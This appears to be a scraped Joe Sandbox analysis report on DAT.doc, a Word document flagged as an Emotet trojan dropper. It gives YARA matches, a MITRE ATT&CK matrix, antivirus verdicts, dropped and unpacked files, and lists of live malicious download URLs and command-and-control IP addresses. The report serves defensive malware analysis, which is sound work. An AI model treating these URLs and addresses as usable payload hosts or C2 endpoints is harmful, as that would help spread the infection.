Source: Yara match	File source: 0000000F.00000002.2153905031.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155916188.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150770541.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147679834.0000000000311000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162568948.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141920127.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2159102288.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2358984806.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155772363.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157336614.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143541090.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147601789.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150877098.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141994054.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162462473.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2149091905.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146032293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146169134.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2153961508.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152298877.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2158760347.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Application Shimming1	Application Shimming1	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer5	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting12	Windows Service1	Windows Service1	Deobfuscate/Decode Files or Information21	LSASS Memory	File and Directory Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Process Injection111	Scripting12	Security Account Manager	System Information Discovery26	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution3	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Security Software Discovery131	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol15	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter111	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Service Execution1	Rc.common	Rc.common	Masquerading21	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	PowerShell4	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection111	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DAT.doc	71%	Virustotal		Browse
DAT.doc	83%	ReversingLabs	Document-Word.Trojan.GenScript

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll	100%	Joe Sandbox ML
C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll	59%	Metadefender		Browse
C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll	76%	ReversingLabs	Win32.Trojan.Emotet

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.2.rundll32.exe.1c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
18.2.rundll32.exe.1f0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.1e0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.1c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.rundll32.exe.190000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
11.2.rundll32.exe.2f0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
17.2.rundll32.exe.1d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.190000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
18.2.rundll32.exe.210000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
19.2.rundll32.exe.210000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.4a0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.310000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.200000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
19.2.rundll32.exe.1f0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.1b0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.1c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.2.rundll32.exe.1f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.1c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.rundll32.exe.1b0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.1d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
15.2.rundll32.exe.1b0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://johnhaydenwrites.com/track_url/P/	100%	Avira URL Cloud	malware
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://nahlasolimandesigns.com/nahla3/d/	100%	Avira URL Cloud	malware
https://vietnhabienhoa.com/wordpress/QUTy/P	100%	Avira URL Cloud	malware
http://zenithcampus.com	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://167.71.148.58:443/um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://hbprivileged.com/cgi-bin/kcggF/	100%	Avira URL Cloud	malware
http://zenithcampus.com/l/yQ/	100%	Avira URL Cloud	malware
https://football-eg.com/web_map/n/	100%	Avira URL Cloud	malware
https://vietnhabienhoa.com/wordpress/QUTy/	100%	Avira URL Cloud	malware
https://zenithcampus.com/wp-json/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
localaffordableroofer.com	107.180.12.39	true	true		unknown
zenithcampus.com	35.200.206.198	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://167.71.148.58:443/um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/	true	Avira URL Cloud: safe	unknown
http://zenithcampus.com/l/yQ/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	false		high
https://johnhaydenwrites.com/track_url/P/	powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://investor.msn.com	rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2139305270.0000000002470000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2143212470.0000000002770000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2144888495.0000000002780000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.2164826084.0000000002860000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	false		high
https://nahlasolimandesigns.com/nahla3/d/	powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://vietnhabienhoa.com/wordpress/QUTy/P	powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://zenithcampus.com	powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	false		high
https://api.w.org/	powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	false		high
http://www.piriform.com/ccleaner	powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	false		high
http://www.%s.comPA	powershell.exe, 00000005.00000002.2139305270.0000000002470000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2143212470.0000000002770000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2144888495.0000000002780000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.2164826084.0000000002860000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	false		high
http://hbprivileged.com/cgi-bin/kcggF/	powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.piriform.com/cclea	powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	false		high
https://football-eg.com/web_map/n/	powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://vietnhabienhoa.com/wordpress/QUTy/	powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://zenithcampus.com/wp-json/	powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
167.71.148.58	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
35.200.206.198	unknown	United States	15169	GOOGLEUS	true
202.187.222.40	unknown	Malaysia	9930	TTNET-MYTIMEdotComBerhadMY	true
107.180.12.39	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
184.66.18.83	unknown	Canada	6327	SHAWCA	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344355
Start date:	26.01.2021
Start time:	13:47:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DAT.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@36/9@2/5
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 64.5% (good quality ratio 59%) Quality average: 70% Quality standard deviation: 29.4%
HCA Information:	Successful, ratio: 91% Number of executed functions: 95 Number of non-executed functions: 113
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Execution Graph export aborted for target powershell.exe, PID 2536 because it is empty Execution Graph export aborted for target rundll32.exe, PID 1484 because there are no executed function Execution Graph export aborted for target rundll32.exe, PID 1916 because there are no executed function Execution Graph export aborted for target rundll32.exe, PID 2488 because there are no executed function Execution Graph export aborted for target rundll32.exe, PID 2860 because there are no executed function Execution Graph export aborted for target rundll32.exe, PID 2968 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:47:49	API Interceptor	1x Sleep call for process: msg.exe modified
13:47:50	API Interceptor	128x Sleep call for process: powershell.exe modified
13:48:05	API Interceptor	507x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
167.71.148.58	Doc.doc	Get hash	malicious	Browse	167.71.148.58:443/7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/
	Informacion_4-09757.doc	Get hash	malicious	Browse	167.71.148.58:443/ta2men4jqfnerm/
	Info.doc	Get hash	malicious	Browse	167.71.148.58:443/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/
	09922748 2020 909_3553.doc	Get hash	malicious	Browse	167.71.148.58:443/hmj5vtnwvmoed5al/v2rzu19kezl4ociy/lwcymauesm35l/scrqoykcge7ozr/lwmckdg2s4/
	info-29-122020.doc	Get hash	malicious	Browse	167.71.148.58:443/qk90ciyt532x3l/3frjvkqc2dudu/bwrw/
	79685175.doc	Get hash	malicious	Browse	167.71.148.58:443/ddfeddgtlve8/qea5xg5lugywunnrb/3fep6lwfy/5iyhveusfl/walzhzdp/
	INV750178 281220.doc	Get hash	malicious	Browse	167.71.148.58:443/n8j7z917hs/
	ARCHIVOFile-2020-IM-65448896.doc	Get hash	malicious	Browse	167.71.148.58:443/dz0y/
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	167.71.148.58:443/9kb8jd09jfjjzu6p/710krlahr1w7x1ai4dw/vrx55jw5pft/29cpm1xmdw/44c4i7/
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	167.71.148.58:443/9d9qfmnts3/vjvjz2rwjwd3/kruxv/r53q9e331/vmffjrhd6r8m0no7f0/
	MENSAJE.doc	Get hash	malicious	Browse	167.71.148.58:443/r8a9ihd5x7y9gubs/0w29tdx9/w9aqw0fel8ghiol/
	ARCH.doc	Get hash	malicious	Browse	167.71.148.58:443/yndmmlzko00/thlmglu2/litlfgg7al5t/7c2tfqo837z45f/
	naamloos-40727_8209243962.doc	Get hash	malicious	Browse	167.71.148.58:443/qov6j8tqrxo/qmy5tpwx15euwz50u/etk5u/er4m7h0jkgtu0lqulo/0npx0hy2i/yjsj5l2i/
	arc-20201229-07546.doc	Get hash	malicious	Browse	167.71.148.58:443/rmc2rtnzt4/fga45dyk3awr/2sr766n207t/
	FIL_49106127 528164.doc	Get hash	malicious	Browse	167.71.148.58:443/10uvse7/v0kinw131/ed37ws4ddndv1iwbh9/a3yymy4k79ii39ps/
	Adjunto_2020_UH-13478.doc	Get hash	malicious	Browse	167.71.148.58:443/495u60b7ajrab1a3v/6l2h13gy/wjaosw38b/dftbhdpoilzw3/em8pnsrzerk714/6919nubsvqxw2911/
	Dati.doc	Get hash	malicious	Browse	167.71.148.58:443/i6p9p6/
	4693747_2020_7865319.doc	Get hash	malicious	Browse	167.71.148.58:443/dd8xgec1513nstpclm7/1tb9c9bqpxml9mrid55/
	ARCH.doc	Get hash	malicious	Browse	167.71.148.58:443/1mpy4lrtxykgw5i/yn5yixx/
	LIST_20201229_1397.doc	Get hash	malicious	Browse	167.71.148.58:443/11c0whd0/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
localaffordableroofer.com	ARCH-SO-930373.doc	Get hash	malicious	Browse	107.180.12.39
	14 2212 2020 062_546248.doc	Get hash	malicious	Browse	107.180.12.39
	rep_2020_12_22.doc	Get hash	malicious	Browse	107.180.12.39
zenithcampus.com	ARCH-SO-930373.doc	Get hash	malicious	Browse	35.200.206.198
	14 2212 2020 062_546248.doc	Get hash	malicious	Browse	35.200.206.198
	GDT299-20201222-4219523.doc	Get hash	malicious	Browse	35.200.206.198
	6654 22.doc	Get hash	malicious	Browse	35.200.206.198

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLEUS	Bestellung.doc	Get hash	malicious	Browse	172.217.6.174
	.01.2021a.js	Get hash	malicious	Browse	35.228.108.144
	QT21006189.exe	Get hash	malicious	Browse	108.177.119.109
	1-26.exe	Get hash	malicious	Browse	34.102.136.180
	Request.xlsx	Get hash	malicious	Browse	34.102.136.180
	INV_TMB_210567Y00.xlsx	Get hash	malicious	Browse	34.102.136.180
	RFQ.xlsx	Get hash	malicious	Browse	34.102.136.180
	New Year Inquiry List.xlsx	Get hash	malicious	Browse	34.102.136.180
	RF-E93-STD-068 SUPPLIES.xlsx	Get hash	malicious	Browse	34.102.136.180
	gPGTcEMoM1.exe	Get hash	malicious	Browse	34.102.136.180
	bgJPIZIYby.exe	Get hash	malicious	Browse	34.102.136.180
	vA0mtZ7JzJ.exe	Get hash	malicious	Browse	34.102.136.180
	E4Q30tDEB9.exe	Get hash	malicious	Browse	34.102.136.180
	N00048481397007.doc	Get hash	malicious	Browse	172.217.6.174
	INGNhYonmgtGZ9Updf.exe	Get hash	malicious	Browse	34.98.99.30
	Order.doc	Get hash	malicious	Browse	172.217.6.174
	FileZilla_3.52.2_win64_sponsored-setup.exe	Get hash	malicious	Browse	216.58.207.142
	N00048481397007.doc	Get hash	malicious	Browse	172.217.6.174
	DHL.6.apk	Get hash	malicious	Browse	172.217.20.238
	Tebling_Resortsac_FILE-HP38XM.htm	Get hash	malicious	Browse	172.217.22.225
DIGITALOCEAN-ASNUS	ARCH_98_24301.doc	Get hash	malicious	Browse	138.68.42.38
	Bestellung.doc	Get hash	malicious	Browse	157.245.145.87
	RF-E93-STD-068 SUPPLIES.xlsx	Get hash	malicious	Browse	178.62.115.183
	vA0mtZ7JzJ.exe	Get hash	malicious	Browse	107.170.138.56
	SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	159.89.91.92
